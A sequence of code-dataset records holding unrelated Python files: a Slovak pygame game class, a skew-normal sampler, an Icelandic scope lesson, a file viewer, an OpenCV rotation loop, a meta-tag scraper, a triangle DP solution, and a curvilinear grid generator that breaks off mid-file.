dajGroupMobkyNahanajuceHraca(self):\r\n return self.mobkyNahanajuceHraca\r\n \r\n def dajPostavyGroup(self):\r\n return self.postavyGroup\r\n \r\n def dajManazerOkien(self):\r\n return self.manazerOkien\r\n \r\n def dajMobkyNahanajuceHraca(self):\r\n return self.mobkyNahanajuceHraca\r\n \r\n def dajPocetTickov(self):\r\n return self.pocetTickov\r\n\r\n def dajHraca(self):\r\n return self.hrac\r\n \r\n def dajOknoInventarRychlyPristup(self):\r\n return self.invOknoRychlyPristup\r\n \r\n def dajGroupPreMobky(self):\r\n return self.mobky\r\n\r\n\r\n \r\n def initInformacieOHracovi(self,scale):\r\n width= int(640*scale)\r\n posX = int(320*scale)\r\n posY = int(630*scale)\r\n height = int(80*scale)\r\n self.invOknoRychlyPristup = oknoInventar.OknoInventar(pygame.Rect(posX,posY,width,height),64)\r\n #posX = int(390*scale)\r\n #posY = int(610*scale)\r\n sirka= int(500*scale)\r\n vyska = int(20*scale)\r\n self.healthBar = textury.dajTexturu(enumTextura.EnumTextura.HEALTH_BAR, sirka, vyska)\r\n self.sirkaHpBaru = sirka\r\n self.sirkaUkazovatelaZdravia = sirka\r\n self.updateUkazovatelZdravia(scale)\r\n \r\n posX = int(390*scale)\r\n posY = int(610*scale)\r\n self.poziciaTextHpBar = [posX+sirka/2 -22*scale,posY+2*scale]\r\n \r\n \r\n '''\r\n \r\n pravidelne kontroluje zmenu zdravia aby mohlo dojst k aktualizacii - nie prilis vhodne riesenie \r\n ''' \r\n def skontrolujAktualnostZdravia(self,scale):\r\n #koli efektu - taktiez uz nebude nutne updatovat zdravie hracovi toto to skontroluje\r\n #vzhladom na to ze ide o destinne cila tak porovnavam vzdialenosti 2 bodov od realneho a ktory je na tom lepsie ten sa stane novym\r\n nas = self.hrac.dajHp()/self.hrac.dajMaxHp()\r\n nasGraf = self.sirkaUkazovatelaZdravia/self.sirkaHpBaru\r\n if nas 0:\r\n infObj.scale(nas)\r\n \r\n for obj in infObjekty.objMapaScalovanie:\r\n obj.scale(nas)\r\n obj.updateScreenPosition(self.mapa)\r\n else:\r\n for policko in self.polickaSprites:\r\n policko.updatePozicie(self.mapa)\r\n policko.updateScreenPosition(self.mapa)\r\n \r\n for obj in infObjekty.objMapaScalovanie:\r\n obj.updateScreenPosition(self.mapa)\r\n \r\n for postava in self.mrtvePostavy:\r\n postava.updateScreenPosition(self.mapa)\r\n\r\n\r\n for postava in self.postavyGroup:\r\n postava.updateTopLeft(self.mapa.dajNas())\r\n postava.updateScreenPosition(self.mapa)\r\n try:\r\n postava.updateLayer()\r\n except ValueError:\r\n '''\r\n Pri update pozicie sa postavy mozu zmazat ak sa ocitnu mimo nacitanej oblasti\r\n Ak sa tak stane uz nie je mozne menit layer kedze tato postava bola z groupy uz odstranena.\r\n Pri buducom iterovani cez self.postavyGroup uz tento problem nebude kedze sa tato postava odstrani aj z tohto zoznamu\r\n '''\r\n pass \r\n \r\n \r\n \r\n\r\n \r\n #for sprite in self.aktivBlitObjMapa:\r\n # try:\r\n # sprite.dorobit(self.mapa)\r\n # except:\r\n # pass\r\n \r\n\r\n \r\n\r\n \r\n \r\n self.polickaSprites.draw(self.screen)\r\n self.mrtvePostavy.draw(self.screen)\r\n self.aktivBlitObjMapa.draw(self.screen)\r\n \r\n #self.polickaSpritesTEST.draw(self.screen)\r\n '''\r\n if self.fpsCount == 20:\r\n #print(\"---------------\")\r\n #print (len(self.polickaSprites))\r\n #print (len(self.aktivBlitObjMapa))\r\n '''\r\n if not self.manazerOkien.jeVykresleneNejakeMenu():\r\n self.hrac.vykresliOznacenyPredmet(self.screen)\r\n self.invOknoRychlyPristup.draw(self.screen)\r\n self.vykresliHpBar(self.screen)\r\n \r\n def dajFPS(self):\r\n return self.pocetFPS\r\n def dajTPS(self):\r\n return self.pocetTPS\r\n \r\n def vykresliHpBar(self,screen):\r\n if 
self.sirkaUkazovatelaZdravia > 0:\r\n pygame.draw.polygon(screen,nastavenia.RED,self.umiestnenieHp)\r\n screen.blit(self.healthBar,(self.umiestnenieHp[0][0],self.umiestnenieHp[0][1]))\r\n \r\n #vykreslenie textu\r\n zdravie = self.hrac.dajHp()\r\n maxZdr = self.hrac.dajMaxHp()\r\n font = textury.dajFont(16)\r\n text = str(str(zdravie) + \"/\" + str(maxZdr))\r\n textSurf = font.render(text, 10, nastavenia.YELLOW)\r\n self.screen.blit(textSurf, self.poziciaTextHpBar)\r\n \r\n def zrusNahananie(self,postava):\r\n for mobka in self.mobkyNahanajuceHraca:\r\n mobka.prestanNahanat(postava)\r\n\r\n \r\n \r\n def dajMapu(self):\r\n return self.mapa\r\n \r\n def klikButton1(self):\r\n self.hrac.klikButton1()\r\n def klikButton2(self):\r\n self.hrac.klikButton2()\r\n def klikButton3(self):\r\n self.hrac.klikButton3()\r\n def klikButton4(self):\r\n self.hrac.klikButton4()\r\n def klikButton5(self):\r\n self.hrac.klikButton5()\r\n \r\n \r\n '''\r\n vykresluje informacie v rohu okna ako je fps tps poziciu hraca \r\n ''' \r\n def vykresliInfoRoh(self):\r\n font = textury.dajFont(16)\r\n \r\n text = str(\"x: \" + str(self.hrac.suradnice[0]) + \" y: \" + str(self.hrac.suradnice[1]))\r\n textSurf = font.render(text, 10, (255,255,0))#ERROR zero width? rychle spustenie do prava\r\n self.screen.blit(textSurf, (10, 10))\r\n \r\n text = \"FPS: \" + str(self.pocetFPS)\r\n textSurf = font.render(text, 10, (255,255,0))\r\n self.screen.blit(textSurf, (10, 30))\r\n \r\n text = \"TPS: \" + str(self.pocetTPS)\r\n textSurf = font.render(text, 10, (255,255,0))\r\n self.screen.blit(textSurf, (10, 50))\r\n \r\n text = \"CP: \" + str(self.manazerOkien.dajPercentoVyuzivaniaCPU()) \r\n textSurf = font.render(text, 10, (255,255,0))\r\n self.screen.blit(textSurf, (10, 70))\r\n \r\n\r\n\r\n \r\n \r\n #self.hracKocka = pygame.Surface((64,64))\r\n #self.hracKocka.fill((255,0,0))\r\n #self.screen.blit(self.hracKocka,(self.hrac.rect.topleft))\r\n pygame.display.flip() \r\n \r\n \r\n '''\r\n update hry kto sa pohol AI a pod\r\n \r\n ''' \r\n def update(self,jePauza):\r\n \r\n if not jePauza:\r\n self.casovanieModulo +=1\r\n self.pocetTickov += 1\r\n scale = nastavenia.ROZLISENIA_X[nastavenia.vybrateRozlisenie]/1280\r\n \r\n \r\n #zlozitostVKroku = time.time()\r\n modulo10 = self.casovanieModulo % 10\r\n modulo100 = self.casovanieModulo % 100\r\n \r\n if modulo100 == 72:\r\n self.mapa.zmenilSaZoom()#len docasne\r\n \r\n self.tpsCount += 1\r\n if time.time() > self.timeUP:\r\n self.timeUP = time.time()+1\r\n self.pocetFPS = self.fpsCount\r\n self.pocetTPS = self.tpsCount\r\n self.tpsCount = 0\r\n self.fpsCount = 0\r\n \r\n self.postavyGroup.update([modulo100])#tu uz je aj hrac\r\n \r\n if modulo10 == 1 or modulo10 == 6: \r\n self.mapa.updateZoom()\r\n \r\n self.riadMobky(modulo100,modulo10)\r\n \r\n for npc in self.mobkyNahanajuceHraca:\r\n npc.cinnostNahanaHraca(modulo100)\r\n\r\n logging.info(\"hrac-eventy\")\r\n self.hrac.eventy()\r\n self.skontrolujAktualnostZdravia(scale)\r\n \r\n casPoslednyFrame = self.manazerOkien.dajCasOdPoslednehoFramu()\r\n #takto cez ify to je pain\r\n if casPoslednyFrame > 0.02:\r\n if random.random() < casPoslednyFrame*20:\r\n return\r\n if casPoslednyFrame > 0.04:\r\n return \r\n casNaNacitanie = 0.000017/casPoslednyFrame\r\n self.mapa.nacitajPolicka(self.hrac, casNaNacitanie)\r\n \r\n \r\n #iba raz za cas napr raz za 2 sec mozno viac\r\n def updateHluku(self):\r\n self.hlukoveCentra = {}\r\n self.hodnotyHlukovychCentier = {}\r\n id = 0\r\n for postava in self.postavyGroup:\r\n esteTrebaUlozit = True\r\n 
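# --- aside: the HP-bar bookkeeping above, isolated. The class nudges its
# drawn width toward a target each tick; the target itself is just the
# hp/max ratio applied to the full bar width, clamped to the bar:
def hp_bar_width(hp, max_hp, bar_width):
    ratio = max(0.0, min(1.0, hp / float(max_hp)))
    return int(bar_width * ratio)

print(hp_bar_width(35, 100, 500))  # -> 175
# --- end aside ---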
for hlukCentrum in self.hlukoveCentra.values():\r\n vzdialenost = hlukCentrum[0].dajVzdialenostOdPostavy(postava)\r\n if vzdialenost < 200:\r\n hlukCentrum[postava] = postava\r\n self.hodnotyHlukovychCentier[hlukCentrum[0]] += postava.dajHodnotuHluku()\r\n esteTrebaUlozit = False\r\n break\r\n if esteTrebaUlozit:\r\n self.hlukoveCentra[postava] = {0:postava}#nove hlukove centrum\r\n self.hodnotyHlukovychCentier[postava] = postava.dajHodnotuHluku()#leader ako kluc do dic pre hodnoty\r\n \r\n #self.pocetHlukovychCentrier = id-1\r\n \r\n def dajHlukoveCentra(self):\r\n return self.hlukoveCentra\r\n def dajHodnotyHlukovychCentier(self):\r\n return self.hodnotyHlukovychCentier\r\n\r\n def riadMobky(self,modulo100,modulo10):\r\n poc = math.ceil(len(self.mobky)/10)\r\n \r\n if poc == 0:\r\n return\r\n \r\n if modulo100 == 74:\r\n self.updateHluku()\r\n \r\n if modulo100 == 95:\r\n for postava in self.mrtvePostavy:\r\n postava.cekniVymazaniePostavy()\r\n\r\n if modulo10 == 7:\r\n if self.casNextUpdateStavNpc < time.time():\r\n self.casNextUpdateStavNpc = time.time() + 1/len(self.mobky)\r\n samp = random.sample(list(self.mobky),poc)\r\n for mob in samp:\r\n mob.updateZmenStav()\r\n \r\n \r\n \r\n elif modulo10 == 3: # ak je 0 vykonava sa zoom co je operacia zlozita na vypocet preto mu nebudeme pridavat 1 do istoty aby sa tam spravil frame\r\n samp = random.sample(list(self.mobky),poc)\r\n for mob in samp:\r\n mob.updateCinnostStavu()\r\n \r\n \r\n def stlacena0(self):\r\n self.hrac.stlacena0()\r\n \r\n def stlacena1(self):\r\n self.hrac.stlacena1()\r\n \r\n def stlacena2(self):\r\n self.hrac.stlacena2()\r\n \r\n def stlacena3(self):\r\n self.hrac.stlacena3()\r\n \r\n def stlacena4(self):\r\n self.hrac.stlacena4()\r\n \r\n def stlacena5(self):\r\n self.hrac.stlacena5()\r\n \r\n def stlacena6(self):\r\n self.hrac.stlacena6()\r\n \r\n def stlacena7(self):\r\n self.hrac.stlacena7()\r\n \r\n def stlacena8(self):\r\n self.hrac.stlacena8()\r\n \r\n def stlacena9(self):\r\n self.hrac.stlacena9()\r\n \r\n def stlaceneR(self):\r\n self.hrac.stlaceneR()\r\n \r\n \r\n \r\n \r\n \r\n ","sub_path":"Tomas Filip BP/src/hra.py","file_name":"hra.py","file_ext":"py","file_size_in_byte":15985,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"179119831","text":"from scipy.stats import skewnorm\nimport matplotlib.pyplot as plt\nimport numpy as np\n\nDATASIZE = 1000\nSKEW_PARAMS = [-3, 0]\n\ndef randn_skew(N, alpha=0.0, loc=0.0, scale=1.0):\n sigma = alpha / np.sqrt(1.0 + alpha**2) \n u0 = np.random.randn(N)\n v = np.random.randn(N)\n u1 = (sigma*u0 + np.sqrt(1.0 - sigma**2)*v) * scale\n u1[u0 < 0] *= -1\n u1 = u1 + loc\n return u1\n\n# lets check again\np = -1 * randn_skew(DATASIZE, -100, 120, 500)\nprint(np.rint(p))\nprint(max(np.rint(p)), min(np.rint(p)), np.average(p))\nplt.plot(p)\nplt.show()\n","sub_path":"sample_scripts/skew_norm.py","file_name":"skew_norm.py","file_ext":"py","file_size_in_byte":545,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"120004675","text":"\n# Þetta sýnidæmi sýnir hvernig gildissvið (á ensku scope) breytu virkar í Python\n# Python hefur svokallað function scope eða fallagildissvið en það þýðir að gildissvið breytu\n# er global/víðvært nema hún sé gerð inni í falli en þá er gildissviðið local/staðvært inni\n# í fallinu.\nname = \"Sveinn\"\n\ndef say_hello():\n # breytan name er víðvær/global og við höfum aðgang að henni inni í fallinu\n print(\"Hello\", name)\n local_breyta = 
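# --- aside: skewnorm is imported in the sampling script above but never used;
# the hand-rolled randn_skew is the standard Azzalini construction, so scipy's
# sampler gives the same distribution directly, with the same
# (alpha, loc, scale) parameterisation:
from scipy.stats import skewnorm
import numpy as np

samples = skewnorm.rvs(a=-100, loc=120, scale=500, size=1000)
print(np.rint(samples).min(), np.rint(samples).max(), samples.mean())
# --- end aside ---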
5\n\n# hinsvegar myndum við ekki geta keyrt eftirfarandi skipun vegna þess að hún er staðvær/local\n# og við höfum þess vegna ekki aðgang að henni þegar við erum ekki stödd inni í fallinu, \n# prófið að taka # af næstu línu og keyra svo forritið til að sjá hvað gerist\n#print(local_breyta)\n\ndef change_my_name(new_name):\n # ef við hefðum sleppt línunni sem segir global name þá hefðum við gert nýja breytu\n # sem hefði staðvært gildissvið og víðværa breytan name hefði ekki breyst\n # prófið að setja # fyrir framan global name og sjáið hvað say_hello() fallið \n # gerir þá.\n global name\n name = new_name \n\nsay_hello()\nchange_my_name(\"Arnar\")\nsay_hello()\n\ntala1, tala2 = 2, 3\n\ndef add_and_plus_one(stiki1, stiki2):\n # stiki1 verður nú 3\n stiki1 += 1\n # summan af 3+3 er 6\n return stiki1 + stiki2\n\nprint(add_and_plus_one(tala1, tala2))\n# en raunstikinn tala1 er óbreyttur, skipunin stiki1 += 1 breytti ekki raunstikanum\nprint(tala1, tala2)\n\n\n","sub_path":"Sýnidæmi/Synidaemi17.py","file_name":"Synidaemi17.py","file_ext":"py","file_size_in_byte":1499,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"324094104","text":"import os\r\n\r\ndef displayFiles(filepath):\r\n if os.path.isfile(filepath):\r\n print('File name: ' + filepath)\r\n print(open(filepath).read())\r\n elif os.path.isdir(filepath):\r\n print('Directory name: ' + filepath)\r\n for dir, subdir, files in os.walk(filepath):\r\n for item in files:\r\n displayFiles(filepath + '/' + item)\r\n else:\r\n print('Big trouble')\r\n\r\ndisplayFiles('/Users/family/test')\r\n","sub_path":"IS code examples/Unit 6/viewfiles.py","file_name":"viewfiles.py","file_ext":"py","file_size_in_byte":454,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"355236618","text":"import cv2\nimport numpy as np\nfrom tkinter import *\n\n# src = cv2.imread('ima.png', cv2.IMREAD_UNCHANGED)\n\n# scale_percent = 50\n# width = int(src.shape[1] * scale_percent / 100)\n# height = int(src.shape[0] * scale_percent / 100)\n# desired_size = (width, height)\n\n# image_front_resize = cv2.resize(src, desired_size)\n\n# cv2.imshow('Salida', image_front_resize)\n# cv2.imwrite('fot.png', image_front_resize)\n# cv2.waitKey()\n# cv2.destroyAllWindows()\n\nimage = cv2.imread('ima.png')\nancho = image.shape[1] #columnas\nalto = image.shape[0] # filas\n\n# Rotación\nM = cv2.getRotationMatrix2D((ancho//2,alto//2),1.2,1)\nimageOut = cv2.warpAffine(image,M,(ancho,alto))\ncontador = 0\nwhile True:\n\t# Rotación\n\tcontador = contador + 0.5\n\tif contador == 365:\n\t\tcontador = 0\n\tM = cv2.getRotationMatrix2D((ancho//2,alto//2),contador,1)\n\timageOut = cv2.warpAffine(image,M,(ancho,alto))\n\tcv2.imshow('frame',imageOut)\n\n\tif cv2.waitKey(1) & 0xFF == ord('q'):\n\t\tbreak","sub_path":"rotatePil.py","file_name":"rotatePil.py","file_ext":"py","file_size_in_byte":942,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"81563594","text":"import requests\nfrom bs4 import BeautifulSoup\n\n\n\n# def scrap (url):\n# result = requests.get(search_string, allow_redirects=True)\n# src = result.content\n# soup = BeautifulSoup(src, 'lxml')\n# metas = soup.find_all('meta')\n# search_result = [meta.attrs['content'] for meta in metas if 'name' in meta.attrs and meta.attrs['name'] == 'description']\n# print ([meta.attrs['content'] for meta in metas if 'name' in meta.attrs and meta.attrs['name'] == 'description'])\n# return 
search_result['items']\n\n\n\nurl=\"https://www.trojmiasto.pl\"\nresult = requests.get(url, allow_redirects=True)\nsrc = result.content\nsoup = BeautifulSoup(src, 'lxml')\n\nmetas = soup.find_all('meta')\n\nsearchresult = [ meta.attrs['content'] for meta in metas if 'name' in meta.attrs and meta.attrs['name'] == 'description' ]\n\nprint(searchresult)\n#\n# searchresult = [ meta.attrs['content'] for meta in metas if 'name' in meta.attrs and meta.attrs['name'] == 'keywords' ]\n\n#print ([ meta.attrs['content'] for meta in metas if 'name' in meta.attrs and meta.attrs['name'] == 'description' ])\n\n#data_soup = BeautifulSoup('
foo!
', features=\"lxml\")\n#lala=soup.find_all('meta') # gitarka\n\n#for metatag in soup.find_all('meta'):\n # desctag=metatag.find('description')\n\n#lala=soup.findAll('div',attrs={\"class\":\"meta\"})\n\n#lala=soup.find_all(attrs={\"description\": \"value\"})\n\n\n#print (lala)\n\n#print(soup.find_all(\"keywords\"))\n\n\n","sub_path":"scrap.py","file_name":"scrap.py","file_ext":"py","file_size_in_byte":1440,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"4903571","text":"class Solution(object):\n def minimumTotal(self, triangle):\n \"\"\"\n :type triangle: List[List[int]]\n :rtype: int\n \"\"\"\n # second round\n # 2016-07-12\n # first though dfs, then dp\n if triangle == []:\n return 0\n total = triangle[0]\n for l in triangle[1:]:\n newtotal = [total[0] + l[0]]\n for c in range(1,len(l)-1):\n newtotal.append(min(total[c],total[c-1]) + l[c])\n newtotal.append(total[-1]+l[-1])\n total = newtotal\n \n return min(total)\n \n","sub_path":"120-triangle/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":601,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"604621011","text":"# -----------------------------------------------------------------------------------#\n# First iteration: curvilinear grid design tool \n# Started 29/05/18 - Author: Stephen Winn \n# -----------------------------------------------------------------------------------#\n\n\n\n# -----------------------------------------------------------------------------------#\n# Import modules \nimport math\nimport numpy as np\nimport matplotlib \nimport matplotlib.pyplot as plt\nfrom matplotlib import rc\nfrom function import *\nfrom sympy import *\nfrom scipy.optimize import fsolve\n\n# -----------------------------------------------------------------------------------#\n#Force LaTeX use -- taken from E.T.\nfnt = 14 # font size\nrc('text', usetex=True)\nrc('text.latex',preamble=r'\\usepackage{bm}')\nfont = {'family': 'serif',\n 'weight': 'normal',\n 'size': fnt+2,\n }\nmatplotlib.rc('font', **font)\n# -----------------------------------------------------------------------------------#\n# Inputs\nnx = 21 #Points in x \nny = 21 #Points in y\nsf = 1 #Show fig or not \nst = 1 #Show titles \nhlo = 2 #Number of halo points \nnsmx = 500 #Max number of iterations \ntol = 1e-6 #Convergence tolerance\nf1sh = 0 #Show fig 1\nf2sh = 1 #Show fig 2\ndbg = 0 #Show debug infos\ndpi = 600 #DPI for figure saving \ninit = 1 #Initial mesh chooser\nbddf = 1\t #Choose how halo points are set (0 fixed spacing x or y, 1 normal to boundary, 2 zero derivative )\ngctl = 1 #Use the grid control functions \nhfnz = 1 #Only use top half of nozzle \nspc = 1.0 #Grid spacing at halos - units of dxi\nspcy = 1.0 #Halo spacing in y\nspcx = 0.9 #Halo spacing in x\na_pl = 5 #Order of phi in 1-eta\nb_pl = 5 \t #Order of phi in eta\nc_pl = 5 \t #Order of psi in 1-eta\t\nd_pl = 5 #Order of psi in eta\n# -----------------------------------------------------------------------------------#\n# Print stuff out for the user\nprint('-----------------------------------------')\nprint(' Curvilinear grid tool v0.0 ')\nprint('-----------------------------------------')\nprint(' Inputs ')\nprint(' nx = %d' %nx)\nprint(' ny = %d' %ny)\nprint(' tolerance = %f' %tol)\nprint('-----------------------------------------')\n\nif dbg == 1:\n\tprint(' Printing debug messages ' )\t\n\n# 
-----------------------------------------------------------------------------------#\n#Initialise a few things \nxi = np.linspace(0.0,1.0,nx+1)\neta = np.linspace(0.0,1.0,ny+1)\nx = np.zeros((nx+1,ny+1))\ny\t = np.zeros((nx+1,ny+1))\ndxdeta = np.zeros((nx+1+2*hlo,ny+1+2*hlo))\ndxdxi\t = np.zeros((nx+1+2*hlo,ny+1+2*hlo))\ndydeta = np.zeros((nx+1+2*hlo,ny+1+2*hlo))\ndydxi\t = np.zeros((nx+1+2*hlo,ny+1+2*hlo))\nit = 0 \ndxi = xi[1] - xi[0]\ndeta = eta[1]- eta[0]\nx_old = np.zeros((nx+1+2*hlo,ny+1+2*hlo) )\ny_old = np.zeros((nx+1+2*hlo,ny+1+2*hlo) )\nhl1 = np.zeros(hlo)\nhl2 = np.zeros(hlo)\n\nif bddf == 1 :\n\tnt = np.zeros((nx+1,2))\n\tnb = np.zeros((nx+1,2))\n\tx_rt = np.zeros((nx+1,hlo))\n\tx_rb\t = np.zeros((nx+1,hlo))\n\ty_rt\t = np.zeros((nx+1,hlo))\n\ty_rb\t = np.zeros((nx+1,hlo))\n\nif gctl == 1:\n\tphi = np.zeros((nx+1+2*hlo,ny+1+2*hlo) )\n\tpsi = np.zeros((nx+1+2*hlo,ny+1+2*hlo) )\n\n# some useful numbers\nzro = np.float64(0.)\nuno = np.float64(1.)\ntwo = np.float64(2.)\nnorm = 1.e5\nerr_y = zro\nerr_x = zro\n# ................................................................ FD coeffs\n\n# compute standard centred finite difference coefficients for the\n# 'nth' derivative with order 'ord' accuracy\nnth = 2 # << must be\nord = 4 # << even numbers\nnco = 2*math.floor((nth+1)/2)-1+ord # stencil length\np = np.int((nco - 1)/2) # half stencil length\nif p > hlo:\n\tprint('** FD ERROR: **')\n\tprint('The standard FD stencil is larger than the halo')\n\tprint('Increase hlo or reduce nth')\n\tsys.exit()\nA = np.zeros((nco,nco)) # \nfor i in np.arange(0,nco): # \n\tfor j in np.arange(0,nco): # FD coefficients (coef) are computed by\n\t\tA[i,j] = (-p+j)**i # solving a linear system A.x=b where x\nb = np.zeros((nco)) # is the vector of the 2*p+1 coefficients\nb[nth] = math.factorial(nth) #\ncoef_d2 = np.linalg.solve(A,b) #\n\n# 'nth' derivative with order 'ord' accuracy\nnth = 1 # << must be\nord = 4 # << even numbers\nnco = 2*math.floor((nth+1)/2)-1+ord # stencil length\np = np.int((nco - 1)/2) # half stencil length\nif p > hlo:\n\tprint('** FD ERROR: **')\n\tprint('The standard FD stencil is larger than the halo')\n\tprint('Increase hlo or reduce nth')\n\tsys.exit()\nA = np.zeros((nco,nco)) # \nfor i in np.arange(0,nco): # \n\tfor j in np.arange(0,nco): # FD coefficients (coef) are computed by\n\t\tA[i,j] = (-p+j)**i # solving a linear system A.x=b where x\nb = np.zeros((nco)) # is the vector of the 2*p+1 coefficients\nb[nth] = math.factorial(nth) #\ncoef_d1 = np.linalg.solve(A,b) #\n\nif dbg == 1:\n\tprint('coefficients with order =', ord)\n\tprint('1st der=', coef_d1)\n\tprint('2nd der=', coef_d2)\n\n# ................................................................ 
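# --- aside: a quick check of the Vandermonde construction above. For the 2nd
# derivative at 2nd-order accuracy the stencil length is 3 and the solve
# should recover the classic [1, -2, 1] weights; the 1st derivative at the
# same order gives [-0.5, 0, 0.5].
import math
import numpy as np

def fd_coeffs(nth, order):
    nco = 2 * math.floor((nth + 1) / 2) - 1 + order  # stencil length
    p = (nco - 1) // 2                               # half stencil length
    A = np.array([[(-p + j) ** i for j in range(nco)] for i in range(nco)],
                 dtype=float)
    b = np.zeros(nco)
    b[nth] = math.factorial(nth)
    return np.linalg.solve(A, b)

print(fd_coeffs(2, 2))  # -> [ 1. -2.  1.]
print(fd_coeffs(1, 2))  # -> [-0.5  0.   0.5]
# --- end aside ---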
end FD\n\n#Set the boundary values for x/y\nfor j in range(0,ny+1):\n\tx[:,j] = np.linspace(0.0,1.0,nx+1)\nAT = 0.75\ny[:,ny] = 0.5*((1.0+AT) + (AT-1.0)*np.cos(np.pi*(2.0*x[:,ny]+1.0) ) )\ny[:,0] = 1.0 - 0.5*((1.0+AT) + (AT-1.0)*np.cos(np.pi*(2.0*x[:,0]+1.0) ) )\n\nif hfnz == 1:\n\ty[:,0] = 0.\n\ny[0,:] = np.linspace(0.0,1.0,ny+1)\ny[nx,:] = np.linspace(0.0,1.0,ny+1)\n\n#Inital mesh guess\nfor j in range(1,ny):\n\tfor i in range(1,nx):\n\t\tif init == 1:\n\t\t\ty[i,j] = y[i,0] + j*(y[i,ny]-y[i,0])/float(ny)\n\t\telse:\n\t\t\ty[i,j] = 0.0 + j*1.0/float(ny)\n\n#Set hl1 and hl2 to constant grid spacing !!!\nfor k in range(0,hlo):\n\thl1[k] = 0.0 - spc*dxi*(k+1)\n\thl2[k] = 1.0 + spc*dxi*(k+1)\n\nif dbg == 1:\n\tprint('Values for halo points ')\n\tprint('hl1',hl1)\n\tprint('hl2',hl2)\n\n# No treatement for halos\nif bddf == 0 or bddf ==2 :\n\t#Initialise first values of X/Y\n\tfor j in range(0,ny+1+2*hlo):\n\t\tif j < hlo:\n\t\t\tx_old[:,j] = np.concatenate((hl1,x[:,0],hl2))\n\t\telif j>ny+hlo:\n\t\t\tx_old[:,j] = np.concatenate((hl1,x[:,ny],hl2))\t\n\t\telse:\t\n\t\t\tx_old[:,j] = np.concatenate((hl1,x[:,j-hlo],hl2))\n\n\tfor i in range(0,nx+1+2*hlo):\n\t\tif inx+hlo: \t\n\t\t\ty_old[i,:] = np.concatenate((hl1,y[nx,:],hl2))\n\t\telse:\t\n\t\t\ty_old[i,:] = np.concatenate((hl1,y[i-hlo,:],hl2))\n\n\tif bddf == 2 :\n\n\t\t#Fill halo points to cancel derivatives at the boundaries:\n\t\tfor i in range(hlo,nx+hlo+1):\n\t\t\tfor k in range(1,hlo+1):\n\t\t\t\tx_old[i,ny+hlo+k] = -coef_d1[hlo-k]/coef_d1[hlo+k]*x_old[i,ny+hlo-k]\n\t\t\t\ty_old[i,ny+hlo+k] = -coef_d1[hlo-k]/coef_d1[hlo+k]*y_old[i,ny+hlo-k]\n\n\t\t\t\tx_old[i,hlo-k] = -coef_d1[hlo+k]/coef_d1[hlo-k]*x_old[i,hlo+k]\n\t\t\t\ty_old[i,hlo-k] = -coef_d1[hlo+k]/coef_d1[hlo-k]*y_old[i,hlo+k]\t\t\t\t\n\n\t\tfor j in range(hlo,ny+hlo+1):\n\t\t\tfor k in range(1,hlo+1):\n\n\t\t\t\tx_old[nx+hlo+k,j] = -coef_d1[hlo-k]/coef_d1[hlo+k]*x_old[nx+hlo-k,j]\n\t\t\t\ty_old[nx+hlo+k,j] = -coef_d1[hlo-k]/coef_d1[hlo+k]*y_old[nx+hlo-k,j]\t\n\n\t\t\t\tx_old[hlo-k,j] = -coef_d1[hlo+k]/coef_d1[hlo-k]*x_old[hlo+k,j]\n\t\t\t\ty_old[hlo-k,j] = -coef_d1[hlo+k]/coef_d1[hlo-k]*y_old[hlo+k,j]\t\t\t\t\n\n# Make halo cells normal to boundary\t\t\t\nelif bddf == 1 :\n\t#Calculate normals at top and bot \n\tfor k in range(0,nx):\n\t\tdx_n = x[k+1,ny] - x[k,ny]\n\t\tdy_n = y[k+1,ny] - y[k,ny]\n\t\tnormn = np.sqrt( dx_n**2 + dy_n**2 )\n\t\tnt[k,0] = -dy_n/normn\n\t\tnt[k,1] = dx_n/normn\n\n\t\tnb[k,0] = -dy_n/normn\n\t\tnb[k,1] = -dx_n/normn\n\n\t\tif hfnz == 1:\n\t\t\tnb[k,0] = 0.\n\t\t\tnb[k,1] = -1.\n\n\tnt[nx,:] = nt[nx-1,:]\t\n\tnb[nx,:] = nb[nx-1,:]\t\n\n\n\tfor i in range(0,nx+1):\n\t\tfor k in range(0,hlo):\n\t\t\tx_rt[i,k] = x[i,ny] + spcx*(k+1)*deta*nt[i,0]\t\n\t\t\tx_rb[i,k] = x[i,0] + spcx*(k+1)*deta*nb[i,0]\t\n\n\tfor i in range(0,nx+1):\n\t\tfor k in range(0,hlo):\n\t\t\ty_rt[i,k] = y[i,ny] + spcy*(k+1)*deta*nt[i,1]\t\n\t\t\ty_rb[i,k] = y[i,0] + spcy*(k+1)*deta*nb[i,1]\t\n\n\tfor j in range(0,ny+1+2*hlo):\n\t\tif j < hlo:\n\t\t\tx_old[:,j] = np.concatenate((hl1,x_rb[:,j],hl2))\n\t\telif j>ny+hlo:\n\t\t\tx_old[:,j] = np.concatenate((hl1,x_rt[:,j-hlo-ny-1],hl2))\t\n\t\telse:\t\n\t\t\tx_old[:,j] = np.concatenate((hl1,x[:,j-hlo],hl2))\n\n\tfor i in range(0,nx+1+2*hlo):\n\t\tif inx+hlo: \t\n\t\t\ty_old[i,:] = np.concatenate((hl1,y[nx,:],hl2))\n\t\telse:\t\n\t\t\ty_old[i,:] = np.concatenate((y_rb[i-hlo,:],y[i-hlo,:],y_rt[i-hlo,:]))\t\t\t\n\n\n\nelif bddf == 2:\n\tprint('Changes made in the main loop')\t\t\t\t\t\t\t\t\n\nelse:\n\tprint('Select boundary halos 
